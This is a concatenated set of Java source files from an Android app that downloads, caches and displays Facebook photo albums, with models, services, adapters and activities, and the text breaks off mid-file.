// Caller has nothing yet: restart from the beginning.
loadInit(albumPhotosListener, album);
} else if (!lastPhoto.equals(lastPhotoCache)) {
// Cache still has unseen photos past the caller's last one.
albumPhotosListener.addNewPhotos(loadFromCache(
albumPhotosListener, lastPhoto, album));
} else {
// Caller has everything cached: fetch the next server page.
loadFromServer(albumPhotosListener, album, totalItems,
albumPhotosDownloader);
}
} else
loadFromServer(albumPhotosListener, album, totalItems,
albumPhotosDownloader);
}
/** True while the downloader started by loadMore() is in flight. */
@Override
public Boolean isDownloading() {
Log.i(TAG, "The downloader is currently : "
+ albumPhotosDownloader.isDownloading);
return albumPhotosDownloader.isDownloading;
}
// Currently unused; see pageCount note above.
private void increasePageCount() {
pageCount = pageCount + LIMIT;
}
// Kicks off the async Facebook photo download starting at currentPage.
private void loadFromServer(final AlbumPhotosListener albumPhotosListener,
final Album album, final Integer currentPage,
AlbumPhotosDownloader albumPhotosDownloader) {
Log.i(TAG, "Loading new photos from server.. ");
GetAlbumPhotosTask task = new GetAlbumPhotosTask(photoService,
albumPhotosDownloader, accessToken, currentPage);
task.execute(album);
}
// Currently unused helper: returns every cached photo for the album.
private List<Photo> loadAllFromCache(Album album) {
Log.i(TAG, "Loading all photos from cache.. ");
return photoService.getAlbumPhotos(album);
}
// Returns up to LIMIT cached photos stored after lastPhoto.
private List<Photo> loadFromCache(
final AlbumPhotosListener albumPhotosListener, Photo lastPhoto,
Album album) {
Log.i(TAG, "Loading filtered photos from cache.. ")<br/>;
return photoService.getAlbumPhotos(album, PhotoService.BACKWARDS,
lastPhoto, LIMIT);
}
/**
 * Bridges GetAlbumPhotosTask callbacks to the listener, tracking in-flight
 * state and driving the optional progress dialog.
 */
private class AlbumPhotosDownloader implements IAlbumPhotosDownloader {
Boolean isDownloading;
AlbumPhotosListener albumPhotosListener;
ProgressDialog progressDialog;
public AlbumPhotosDownloader() {
this.isDownloading = false;
}
public AlbumPhotosDownloader(AlbumPhotosListener albumPhotosListener) {
this.isDownloading = false;
this.albumPhotosListener = albumPhotosListener;
}
public AlbumPhotosDownloader(AlbumPhotosListener albumPhotosListener,
ProgressDialog progressDialog) {
this.isDownloading = false;
this.albumPhotosListener = albumPhotosListener;
this.progressDialog = progressDialog;
}
@Override
public void startingDownload() {
this.isDownloading = true;
albumPhotosListener.startingDownload();
if (progressDialog != null) {
progressDialog.show();
}
}
@Override
public void noMoreAlbumPhotos() {
this.isDownloading = false;
albumPhotosListener.noMorePhotos();
if (progressDialog != null) {
progressDialog.dismiss();
}
}
@Override
public void foundAlbumPhotos(List<Photo> photoList) {
this.isDownloading = false;
albumPhotosListener.addNewPhotos(photoList);
if (progressDialog != null) {
progressDialog.dismiss();
}
}
}
}
<file_sep>/src/com/lopefied/pepemon/db/model/Photo.java
package com.lopefied.pepemon.db.model;
import com.j256.ormlite.field.DatabaseField;
import com.j256.ormlite.table.DatabaseTable;
/**
*
* @author <NAME>
*
*/
@DatabaseTable(tableName = "photo")
public class Photo {
public static final String ID_PK = "ID";
public static final String PHOTO_ID = "photo_id";
public static final String ALBUM = "album";
@DatabaseField(columnName = ID_PK, generatedId = true)
private Integer ID;
@DatabaseField(columnName = PHOTO_ID)
private String photoID;
@DatabaseField(columnName = "photo_url")
private String photoURL;
@DatabaseField(foreign = true, foreignAutoRefresh = true, columnName = ALBUM)
private Album album;
public Photo() {
}
public Photo(String photoURL, String photoID) {
super();
this.photoURL = photoURL;
this.photoID = photoID;
}
public Integer getID() {
return ID;
}
public void setID(Integer iD) {
ID = iD;
}
public String getPhotoID() {
return photoID;
}
public void setPhotoID(String photoID) {
this.photoID = photoID;
}
public String getPhotoURL() {
return photoURL;
}
public void setPhotoURL(String photoURL) {
this.photoURL = photoURL;
}
public Album getAlbum() {
return album;
}
public void setAlbum(Album album) {
this.album = album;
}
@Override
public int hashCode() {
final int prime = 31;
int result = 1;
result = prime * result + ((photoID == null) ? 0 : photoID.hashCode());
return result;
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (getClass() != obj.getClass())
return false;
Photo other = (Photo) obj;
if (photoID == null) {
if (other.photoID != null)
return false;
} else if (!photoID.equals(other.photoID))
return false;
return true;
}
}
<file_sep>/src/com/lopefied/pepemon/adapter/AlbumListAdapter.java
package com.lopefied.pepemon.adapter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import android.content.Context;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.ViewGroup;
import android.widget.ArrayAdapter;
import android.widget.ImageView;
import android.widget.TextView;
import com.lopefied.pepemon.R;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.util.FacebookImageLoader;
/**
* @author <NAME>
*/
public class AlbumListAdapter extends ArrayAdapter<Album> {
    public static final String TAG = AlbumListAdapter.class.getSimpleName();

    private FacebookImageLoader imageLoader;
    private List<Album> albumList = new ArrayList<Album>();
    private Context mContext;
    private IAlbumListAdapter albumListAdapterListener;

    /**
     * @param context          host context, used for inflation and the image loader
     * @param textViewResourceId row layout resource id (passed to ArrayAdapter)
     * @param albumList        backing list of albums to render
     * @param albumListAdapter callback for album taps / token access
     * @param accessToken      Facebook token forwarded to the image loader
     */
    public AlbumListAdapter(Context context, int textViewResourceId,
            List<Album> albumList, IAlbumListAdapter albumListAdapter, String accessToken) {
        super(context, textViewResourceId, albumList);
        this.mContext = context;
        this.albumList = albumList;
        this.imageLoader = FacebookImageLoader.getInstance(context, accessToken);
        this.albumListAdapterListener = albumListAdapter;
    }

    /** Releases cached bitmaps held by the image loader (e.g. on pause). */
    public void clearCache() {
        System.gc();
        Log.i(TAG, "Clearing cache");
        imageLoader.clearCache();
    }

    public void addAll(Collection<? extends Album> collection) {
        albumList.addAll(collection);
    }

    public int getCount() {
        return this.albumList.size();
    }

    public Album getItem(int index) {
        return this.albumList.get(index);
    }

    public List<Album> getList() {
        return this.albumList;
    }

    /**
     * Standard view-holder recycling.
     *
     * Fix: binding previously happened only in the else (recycled-row)
     * branch, so freshly inflated rows were returned with no title, cover
     * image, or click handler until they were recycled. Binding now runs
     * for every row after the holder is resolved.
     */
    public View getView(int position, View convertView, ViewGroup parent) {
        View row = convertView;
        ViewHolder holder;
        if (row == null) {
            LayoutInflater inflater = (LayoutInflater) this.getContext()
                    .getSystemService(Context.LAYOUT_INFLATER_SERVICE);
            row = inflater.inflate(R.layout.item_album, parent, false);
            // View holder for smooth scrolling
            holder = new ViewHolder();
            holder.lblTitle = (TextView) row.findViewById(R.id.lblTitle);
            holder.imgAlbumCover = (ImageView) row.findViewById(R.id.imageView);
            row.setTag(holder);
        } else {
            holder = (ViewHolder) row.getTag();
        }
        final Album album = getItem(position);
        imageLoader.displayImage(album.getAlbumPhotoID(), holder.imgAlbumCover);
        holder.imgAlbumCover.setOnClickListener(new OnClickListener() {
            @Override
            public void onClick(View v) {
                albumListAdapterListener.selected(album);
            }
        });
        holder.lblTitle.setText(album.getAlbumName());
        return row;
    }

    @Override
    public boolean isEnabled(int position) {
        // Rows themselves are not selectable; taps go to the cover image.
        return false;
    }

    public interface IAlbumListAdapter {
        public String getFBToken();

        public void selected(Album album);
    }

    static class ViewHolder {
        public TextView lblTitle;
        public ImageView imgAlbumCover;
    }
}
<file_sep>/src/com/lopefied/pepemon/service/PhotoService.java
package com.lopefied.pepemon.service;
import java.util.List;
import org.json.JSONException;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.service.exception.NoPhotosExistException;
/**
 * Persistence-backed access to cached album photos, plus parsing of the
 * Facebook JSON photo response.
 */
public interface PhotoService {
    // Paging direction flags for getAlbumPhotos(album, direction, photo, limit):
    // BACKWARDS selects photos stored after the anchor photo, FORWARDS before it
    // (see PhotoServiceImpl for the exact primary-key comparison).
    public static final int BACKWARDS = 0;
    public static final int FORWARDS = 1;

    /**
     * Converts a json string as a json array
     *
     * @param response    raw JSON with a top-level "data" array of photos
     * @param accessToken Facebook access token (unused by some implementations)
     * @param album       album the parsed photos belong to
     * @return the photos parsed (and persisted) from the response
     * @throws NoPhotosExistException when the "data" array is empty
     * @throws JSONException on malformed JSON
     */
    public List<Photo> processJSONArrayResponse(String response,
            String accessToken, Album album) throws NoPhotosExistException,
            JSONException;

    // True when at least one photo row exists in the local cache.
    public Boolean isCached();

    // Most recently stored photo for the album, or null when none cached.
    public Photo getLastPhoto(Album album);

    // All cached photos for the album, in insertion order.
    public List<Photo> getAlbumPhotos(Album album);

    // First 'limit' cached photos for the album.
    public List<Photo> getAlbumPhotos(Album album, Integer limit);

    // Up to 'limit' cached photos adjacent to the anchor photo, in the
    // given direction (BACKWARDS / FORWARDS).
    public List<Photo> getAlbumPhotos(Album album, int direction,
            Photo photoID, Integer limit);
}
<file_sep>/src/com/lopefied/pepemon/service/impl/PhotoServiceImpl.java
package com.lopefied.pepemon.service.impl;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import com.j256.ormlite.dao.Dao;
import com.j256.ormlite.stmt.PreparedQuery;
import com.j256.ormlite.stmt.QueryBuilder;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.service.exception.NoPhotosExistException;
import com.lopefied.pepemon.util.FBParseUtils;
/**
 * ORMLite-backed PhotoService: parses Facebook photo JSON into Photo rows
 * and serves paged queries over the local cache, ordered by primary key.
 */
public class PhotoServiceImpl implements PhotoService {
    private Dao<Photo, Integer> photoDAO;

    public PhotoServiceImpl(Dao<Photo, Integer> photoDAO) {
        this.photoDAO = photoDAO;
        try {
            // Photos are numerous and re-queried per album; skip the object cache.
            photoDAO.setObjectCache(false);
        } catch (SQLException e) {
            e.printStackTrace();
        }
    }

    /**
     * Parses the "data" array of a Facebook photo response, persists each
     * photo against the album, and returns the persisted list.
     *
     * @throws NoPhotosExistException when the "data" array is empty
     * @throws JSONException on malformed JSON
     */
    @Override
    public List<Photo> processJSONArrayResponse(String response,
            String accessToken, Album album) throws NoPhotosExistException,
            JSONException {
        List<Photo> photoList = new ArrayList<Photo>();
        JSONObject JOTemp = new JSONObject(response);
        JSONArray JAAlbumPhotos = JOTemp.getJSONArray("data");
        if (JAAlbumPhotos.length() == 0) {
            throw new NoPhotosExistException(album.getAlbumID());
        } else {
            // PAGING JSONOBJECT
            Photo photo;
            for (int i = 0; i < JAAlbumPhotos.length(); i++) {
                JSONObject JOPhoto = JAAlbumPhotos.getJSONObject(i);
                photo = new Photo();
                // Facebook photo id ("pid"); null when absent.
                if (JOPhoto.has("pid")) {
                    photo.setPhotoID(JOPhoto.getString("pid"));
                } else {
                    photo.setPhotoID(null);
                }
                String returnImageURL = FBParseUtils
                        .extractURLFromImageObject(JOPhoto);
                photo.setPhotoURL(returnImageURL);
                photo.setAlbum(album);
                try {
                    // Persist each photo; skip failures and keep the rest.
                    photoDAO.createOrUpdate(photo);
                    photoList.add(photo);
                } catch (SQLException e) {
                    e.printStackTrace();
                }
            }
        }
        return photoList;
    }

    /** True when any photo row exists in the cache. */
    @Override
    public Boolean isCached() {
        try {
            return photoDAO.countOf() > Long.valueOf(0);
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return false;
    }

    /** All cached photos for the album, oldest (lowest pk) first. */
    @Override
    public List<Photo> getAlbumPhotos(Album album) {
        try {
            QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
            queryBuilder.where().eq(Photo.ALBUM, album);
            PreparedQuery<Photo> prepQuery = queryBuilder.orderBy(Photo.ID_PK,
                    true).prepare();
            return photoDAO.query(prepQuery);
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return new ArrayList<Photo>();
    }

    /** First 'limit' cached photos for the album, lowest pk first. */
    @Override
    public List<Photo> getAlbumPhotos(Album album, Integer limit) {
        try {
            QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
            queryBuilder.where().eq(Photo.ALBUM, album);
            PreparedQuery<Photo> prepQuery = queryBuilder
                    .orderBy(Photo.ID_PK, true).limit(Long.valueOf(limit))
                    .prepare();
            return photoDAO.query(prepQuery);
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return new ArrayList<Photo>();
    }

    /**
     * Up to 'limit' photos adjacent to the anchor photo: BACKWARDS selects
     * rows with a larger pk (stored later), FORWARDS rows with a smaller pk.
     * Returns an empty list on error or an unknown direction.
     *
     * Fix: replaced the deprecated {@code new Long(limit)} with
     * {@code Long.valueOf(limit)} for consistency with the overload above,
     * and dropped the redundant pre-built result list.
     */
    @Override
    public List<Photo> getAlbumPhotos(Album album, int direction,
            Photo photo, Integer limit) {
        try {
            QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
            if (direction == PhotoService.BACKWARDS)
                queryBuilder.where().gt(Photo.ID_PK, photo.getID()).and()
                        .eq(Photo.ALBUM, album);
            else if (direction == PhotoService.FORWARDS)
                queryBuilder.where().lt(Photo.ID_PK, photo.getID()).and()
                        .eq(Photo.ALBUM, album);
            else
                throw new SQLException();
            PreparedQuery<Photo> prepQuery = queryBuilder
                    .orderBy(Photo.ID_PK, true).limit(Long.valueOf(limit))
                    .prepare();
            return photoDAO.query(prepQuery);
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return new ArrayList<Photo>();
    }

    /** Most recently stored photo for the album (highest pk), or null. */
    @Override
    public Photo getLastPhoto(Album album) {
        QueryBuilder<Photo, Integer> queryBuilder = photoDAO.queryBuilder();
        try {
            queryBuilder.where().eq(Photo.ALBUM, album);
            PreparedQuery<Photo> prepQuery = queryBuilder.orderBy(Photo.ID_PK,
                    false).prepare();
            Photo result = photoDAO.queryForFirst(prepQuery);
            return result;
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return null;
    }
}
<file_sep>/src/com/lopefied/pepemon/db/DBHelper.java
package com.lopefied.pepemon.db;
import java.sql.SQLException;
import android.content.Context;
import android.database.sqlite.SQLiteDatabase;
import com.j256.ormlite.android.apptools.OrmLiteSqliteOpenHelper;
import com.j256.ormlite.dao.Dao;
import com.j256.ormlite.support.ConnectionSource;
import com.j256.ormlite.table.TableUtils;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
/**
*
* @author lemano
*
*/
public class DBHelper extends OrmLiteSqliteOpenHelper {
private static final String DATABASE_NAME = "pepemon_database.db";
private static final int DATABASE_VERSION = 1;
// Lazily created DAO singletons; see getAlbumDao()/getPhotoDao().
private Dao<Album, Integer> albumTable = null;
private Dao<Photo, Integer> photoTable = null;
private ConnectionSource connectionSource = null;
public DBHelper(Context context) {
super(context, DATABASE_NAME, null, DATABASE_VERSION);
}
/** Creates the album and photo tables on first database creation. */
@Override
public void onCreate(SQLiteDatabase db, ConnectionSource connectionSource) {
this.connectionSource = connectionSource;
try {
TableUtils.createTable(connectionSource, Album.class);
TableUtils.createTable(connectionSource, Photo.class);
} catch (SQLException e) {
// Fatal: the app cannot run without its schema.
throw new RuntimeException(e);
}
}
// Intentionally empty: still at schema version 1, so no migration exists.
// Any future DATABASE_VERSION bump must add migration logic here.
@Override
public void onUpgrade(SQLiteDatabase db, ConnectionSource connectionSource,
int oldVersion, int newVersion) {
}
/** Lazily builds and caches the Album DAO. */
public Dao<Album, Integer> getAlbumDao() throws SQLException {
if (albumTable == null) {
albumTable = getDao(Album.class);
}
return albumTable;
}
/** Lazily builds and caches the Photo DAO. */
public Dao<Photo, Integer> getPhotoDao() throws SQLException {
if (photoTable == null) {
photoTable = getDao(Photo.class);
}
return photoTable;
}
}
}<file_sep>/src/com/lopefied/pepemon/task/GetAlbumsTask.java
package com.lopefied.pepemon.task;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.HttpResponse;
import org.apache.http.HttpStatus;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.util.EntityUtils;
import org.json.JSONArray;
import org.json.JSONObject;
import android.app.ProgressDialog;
import android.os.AsyncTask;
import com.lopefied.pepemon.db.model.Album;
/**
*
* @author <NAME>
*
*/
public class GetAlbumsTask extends AsyncTask<String, Void, List<Album>> {
public static final String PEPEMON_ID = "pepemon2";
private ProgressDialog progressDialog;
private IAlbumDownloader albumDownloader;
// NOTE(review): set in doInBackground but never read back — dead state?
private Boolean stopLoadingData;
private Boolean loadingMore;
public GetAlbumsTask(IAlbumDownloader albumDownloader,
ProgressDialog progressDialog) {
this.albumDownloader = albumDownloader;
this.progressDialog = progressDialog;
}
@Override
protected void onPreExecute() {
// SHOW THE PROGRESS BAR (SPINNER) WHILE LOADING ALBUMS
progressDialog.show();
}
/**
 * Fetches the album list JSON from the URL in params[0] and maps each
 * entry of the "data" array (those having a "link") to an Album.
 * Cover URLs are built as Graph API picture endpoints with the caller's
 * access token appended.
 */
@Override
protected List<Album> doInBackground(String... params) {
List<Album> albumList = new ArrayList<Album>();
// CHANGE THE LOADING MORE STATUS TO PREVENT DUPLICATE CALLS FOR
// MORE DATA WHILE LOADING A BATCH
loadingMore = true;
// SET THE INITIAL URL TO GET THE FIRST LOT OF ALBUMS
String URL = params[0];
try {
HttpClient hc = new DefaultHttpClient();
HttpGet get = new HttpGet(URL);
HttpResponse rp = hc.execute(get);
if (rp.getStatusLine().getStatusCode() == HttpStatus.SC_OK) {
String queryAlbums = EntityUtils.toString(rp.getEntity());
JSONObject JOTemp = new JSONObject(queryAlbums);
JSONArray JAAlbums = JOTemp.getJSONArray("data");
if (JAAlbums.length() == 0) {
// Empty result: signal the end of the album list immediately.
stopLoadingData = true;
albumDownloader.noMoreAlbums();
} else {
Album albums;
for (int i = 0; i < JAAlbums.length(); i++) {
JSONObject JOAlbums = JAAlbums.getJSONObject(i);
// Only entries with a "link" are real albums.
if (JOAlbums.has("link")) {
albums = new Album();
// GET THE ALBUM ID
if (JOAlbums.has("id")) {
albums.setAlbumID(JOAlbums.getString("id"));
} else {
albums.setAlbumID(null);
}
// GET THE ALBUM NAME
if (JOAlbums.has("name")) {
albums.setAlbumName(JOAlbums.getString("name"));
} else {
albums.setAlbumName(null);
}
// GET THE ALBUM COVER PHOTO
if (JOAlbums.has("cover_photo")) {
albums.setAlbumCover("https://graph.facebook.com/"
+ JOAlbums.getString("cover_photo")
+ "/picture?type=normal"
+ "&access_token="
+ albumDownloader.getFBAccessToken());
} else {
// No explicit cover: fall back to the album's own picture.
albums.setAlbumCover("https://graph.facebook.com/"
+ JOAlbums.getString("id")
+ "/picture?type=album"
+ "&access_token="
+ albumDownloader.getFBAccessToken());
}
// GET THE ALBUM'S PHOTO COUNT
if (JOAlbums.has("count")) {
albums.setAlbumPhotoCount(JOAlbums
.getString("count"));
} else {
albums.setAlbumPhotoCount("0");
}
albumList.add(albums);
}
}
}
}
} catch (Exception e) {
// Best-effort: any network/JSON failure yields the partial list.
e.printStackTrace();
}
return albumList;
}
/**
 * Delivers the result on the UI thread.
 * NOTE(review): noMoreAlbums() is invoked unconditionally right after
 * foundAlbums(), even when albums were returned — confirm the listener
 * tolerates this.
 */
@Override
protected void onPostExecute(List<Album> albumList) {
// // SET THE ADAPTER TO THE LISTVIEW
// lv.setAdapter(adapter);
// CHANGE THE LOADING MORE STATUS
loadingMore = false;
// HIDE THE PROGRESS BAR (SPINNER) AFTER LOADING ALBUMS
progressDialog.hide();
albumDownloader.foundAlbums(albumList);
albumDownloader.noMoreAlbums();
}
// Callback contract for consumers of the downloaded album list.
public interface IAlbumDownloader {
public String getFBAccessToken();
public void noMoreAlbums();
public void foundAlbums(List<Album> albumList);
}
}
package com.lopefied.pepemon.service;
import java.util.List;
import org.json.JSONException;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.service.exception.NoAlbumExistsException;
/**
 * Persistence-backed access to cached Facebook albums, plus parsing of the
 * Facebook album-list JSON response.
 */
public interface AlbumService {
    /**
     * Converts a json string as a json array
     *
     * @param response    raw JSON with a top-level "data" array of albums
     * @param accessToken Facebook access token used when building cover URLs
     * @param facebookID  owner id the albums belong to
     * @return the albums parsed (and persisted) from the response
     * @throws NoAlbumExistsException when the "data" array is empty
     * @throws JSONException on malformed JSON
     */
    public List<Album> processJSONArrayResponse(String response,
            String accessToken, String facebookID)
            throws NoAlbumExistsException, JSONException;

    // True when at least one album row exists in the local cache.
    public Boolean isCached();

    // All cached albums.
    public List<Album> getAlbums();

    // Cached album with the given Facebook id; throws when not cached.
    public Album getAlbum(String albumID) throws NoAlbumExistsException;
}
<file_sep>/src/com/lopefied/pepemon/AlbumPhotosActivity.java
package com.lopefied.pepemon;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import android.app.Activity;
import android.app.ProgressDialog;
import android.content.Intent;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.util.Log;
import android.view.Window;
import android.widget.AbsListView;
import android.widget.AbsListView.OnScrollListener;
import android.widget.ListView;
import android.widget.Toast;
import com.j256.ormlite.android.apptools.OpenHelperManager;
import com.lopefied.pepemon.adapter.PhotoListAdapter;
import com.lopefied.pepemon.adapter.PhotoListAdapter.IPhotoListAdapter;
import com.lopefied.pepemon.db.DBHelper;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.provider.AlbumPhotosListener;
import com.lopefied.pepemon.provider.AlbumPhotosProvider;
import com.lopefied.pepemon.provider.impl.AlbumPhotosProviderImpl;
import com.lopefied.pepemon.service.AlbumService;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.service.exception.NoAlbumExistsException;
import com.lopefied.pepemon.service.impl.AlbumServiceImpl;
import com.lopefied.pepemon.service.impl.PhotoServiceImpl;
/**
*
* @author <NAME>
*
*/
public class AlbumPhotosActivity extends Activity {
public static final String TAG = AlbumPhotosActivity.class.getSimpleName();
public static final String ALBUM_ID = "album_id";
private static final int POSITION_TO_LOAD = 2;
private SharedPreferences mPrefs;
private ListView listView;
private Integer currentPage = 0;
private String albumID = null;
private String accessToken = null;
private ProgressDialog progressDialog;
private PhotoListAdapter adapter;
private AlbumPhotosProvider albumPhotosProvider;
private PhotoService photoService;
private AlbumService albumService;
private AlbumPhotosListener albumPhotosListener;
private Album album;
private DBHelper dbHelper;
@Override
public void onCreate(Bundle savedInstanceState) {
// Full-screen gallery: drop the title bar before inflating the layout.
requestWindowFeature(Window.FEATURE_NO_TITLE);
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
init();
}
@Override
protected void onPause() {
super.onPause();
// Free bitmap memory while the activity is backgrounded.
adapter.clearCache();
}
@Override
protected void onResume() {
super.onResume();
// Redraw rows; cached bitmaps may have been dropped in onPause().
adapter.notifyDataSetChanged();
}
@Override
protected void onDestroy() {
super.onDestroy();
// Release the shared OrmLite helper exactly once (guarded by the null-out).
if (dbHelper != null) {
OpenHelperManager.releaseHelper();
dbHelper = null;
}
}
/**
 * Pulls the album id from the launching intent and the cached Facebook
 * access token from shared preferences.
 * NOTE(review): MODE_WORLD_READABLE is deprecated and exposes the token
 * to other apps — consider MODE_PRIVATE.
 */
private void initExtras() {
Bundle extras = getIntent().getExtras();
if (extras != null) {
albumID = extras.getString(ALBUM_ID);
Log.i(TAG, "Got albumID : " + albumID);
/*
 * Get existing access_token if any
 */
mPrefs = getSharedPreferences("com.lopefied.pepemon",
MODE_WORLD_READABLE);
accessToken = mPrefs.getString("access_token", null);
Log.i(TAG, "Got access token : " + accessToken);
}
}
/**
 * Builds the photo list: adapter with a tap-through to the full-screen
 * pager, and a scroll listener that requests the next page when the user
 * nears the bottom of the list (infinite scroll).
 */
private void initViews() {
progressDialog = new ProgressDialog(this);
listView = (ListView) findViewById(R.id.listView);
final String accessToken = mPrefs.getString("access_token", null);
IPhotoListAdapter albumListAdapterListener = new IPhotoListAdapter() {
@Override
public String getFBToken() {
return accessToken;
}
// Tapping a photo opens the swipeable full-screen viewer anchored
// at that photo.
@Override
public void selectPhoto(Photo photo) {
Intent intent = new Intent();
intent.setClass(getApplicationContext(),
ViewPhotoFragmentActivity.class);
intent.putExtra(ViewPhotoFragmentActivity.PHOTO_URL,
photo.getPhotoURL());
intent.putExtra(ViewPhotoFragmentActivity.ALBUM_ID, albumID);
intent.putExtra(ViewPhotoFragmentActivity.CURRENT_PHOTO_ID,
photo.getID());
startActivity(intent);
}
};
adapter = new PhotoListAdapter(this, R.layout.item_album,
new ArrayList<Photo>(), albumListAdapterListener);
listView.setAdapter(adapter);
listView.setOnScrollListener(new OnScrollListener() {
@Override
public void onScrollStateChanged(AbsListView arg0, int arg1) {
}
@Override
public void onScroll(AbsListView listView, int firstVisibleItem,
int visibleItemCount, int totalItemCount) {
switch (listView.getId()) {
case R.id.listView:
// Trigger the next page when within POSITION_TO_LOAD items
// of the end, unless a download is already in flight.
final int lastItem = firstVisibleItem + visibleItemCount;
if ((lastItem >= totalItemCount - POSITION_TO_LOAD)
&& (totalItemCount != 0)) {
Photo lastPhoto = (Photo) listView.getAdapter()
.getItem(totalItemCount - 1);
if (lastPhoto != null) {
if (!albumPhotosProvider.isDownloading()) {
currentPage = totalItemCount;
albumPhotosProvider.loadMore(
albumPhotosListener, lastPhoto, album,
currentPage);
}
}
}
}
}
});
}
/**
 * Acquires the DB helper, configures the download progress dialog,
 * registers the album-photos callback, and starts the initial photo load
 * for the album identified by albumID.
 */
private void initProviders() {
    dbHelper = (DBHelper) OpenHelperManager.getHelper(this, DBHelper.class);
    progressDialog.setCancelable(false);
    progressDialog.setMessage("Downloading photos..");
    // NOTE(review): THEME_DEVICE_DEFAULT_DARK is a theme constant, not a
    // progress style (STYLE_SPINNER / STYLE_HORIZONTAL) — confirm intent.
    progressDialog
            .setProgressStyle(ProgressDialog.THEME_DEVICE_DEFAULT_DARK);
    progressDialog.setProgress(0);
    progressDialog.setMax(100);
    albumPhotosListener = new AlbumPhotosListener() {
        @Override
        public void noMorePhotos() {
            progressDialog.dismiss();
            Toast.makeText(getApplicationContext(), "No more photos",
                    Toast.LENGTH_SHORT).show();
        }
        @Override
        public void error(String message) {
            Toast.makeText(getApplicationContext(), message,
                    Toast.LENGTH_SHORT).show();
        }
        @Override
        public void addNewPhotos(List<Photo> photoList) {
            Log.i(TAG, "Received photos : " + photoList.size());
            if (photoList.size() > 0) {
                loadPhotos(photoList);
            } else {
                Toast.makeText(getApplicationContext(),
                        "No more photos to load", Toast.LENGTH_SHORT).show();
            }
        }
        @Override
        public void startingDownload() {
            Toast.makeText(getApplicationContext(),
                    "Loading more photos..", Toast.LENGTH_SHORT).show();
        }
    };
    try {
        photoService = new PhotoServiceImpl(dbHelper.getPhotoDao());
        albumService = new AlbumServiceImpl(dbHelper.getAlbumDao());
        albumPhotosProvider = new AlbumPhotosProviderImpl(photoService,
                progressDialog, accessToken);
        album = albumService.getAlbum(albumID);
        albumPhotosProvider.loadInit(albumPhotosListener, album);
    } catch (SQLException e) {
        e.printStackTrace();
    } catch (NoAlbumExistsException e) {
        e.printStackTrace();
    }
}
/**
 * Entry point called from onCreate(): wires up intent extras and views,
 * then starts the providers — but only when a valid album ID arrived.
 */
private void init() {
    initExtras();
    initViews();
    if (albumID == null) {
        Log.e(TAG, "Null album ID received");
        return;
    }
    initProviders();
}
/** Appends freshly downloaded photos to the list and refreshes the view. */
private void loadPhotos(List<Photo> photoList) {
    adapter.addAll(photoList);
    adapter.notifyDataSetChanged();
}
}
<file_sep>/src/com/lopefied/pepemon/ViewPhotoFragmentActivity.java
package com.lopefied.pepemon;
import java.sql.SQLException;
import java.util.List;
import android.app.ProgressDialog;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.support.v4.app.FragmentActivity;
import android.support.v4.view.ViewPager;
import android.support.v4.view.ViewPager.OnPageChangeListener;
import android.util.Log;
import android.view.Window;
import android.widget.Toast;
import com.j256.ormlite.android.apptools.OpenHelperManager;
import com.lopefied.pepemon.db.DBHelper;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.fragment.ViewPhotoFragmentAdapter;
import com.lopefied.pepemon.provider.AlbumPhotosListener;
import com.lopefied.pepemon.provider.AlbumPhotosProvider;
import com.lopefied.pepemon.provider.impl.AlbumPhotosProviderImpl;
import com.lopefied.pepemon.service.AlbumService;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.service.exception.NoAlbumExistsException;
import com.lopefied.pepemon.service.impl.AlbumServiceImpl;
import com.lopefied.pepemon.service.impl.PhotoServiceImpl;
/**
*
* @author <NAME>
*
*/
public class ViewPhotoFragmentActivity extends FragmentActivity {
    public static final String TAG = ViewPhotoFragmentActivity.class
            .getSimpleName();
    // Intent extra keys shared with the album list activity.
    public static final String ALBUM_ID = "album_id";
    public static final String PHOTO_URL = "photo_url";
    public static final String CURRENT_PHOTO_ID = "photo_fb_id";
    // Load the next page when the user swipes this close to the end.
    private static final int POSITION_TO_LOAD = 2;
    private SharedPreferences mPrefs;
    private ViewPhotoFragmentAdapter fragmentAdapter;
    private ViewPager mViewPager;
    private Album album;
    private DBHelper dbHelper;
    private PhotoService photoService;
    private AlbumService albumService;
    private String accessToken;
    private AlbumPhotosProvider albumPhotosProvider;
    private ProgressDialog progressDialog;
    private AlbumPhotosListener albumPhotosListener;

    /**
     * Loads the album's photos from the local DB, positions the pager on
     * the photo passed via CURRENT_PHOTO_ID, then wires the lazy-loading
     * provider.
     */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        requestWindowFeature(Window.FEATURE_NO_TITLE);
        super.onCreate(savedInstanceState);
        setContentView(R.layout.view_photo_main);
        mPrefs = getSharedPreferences("com.lopefied.pepemon",
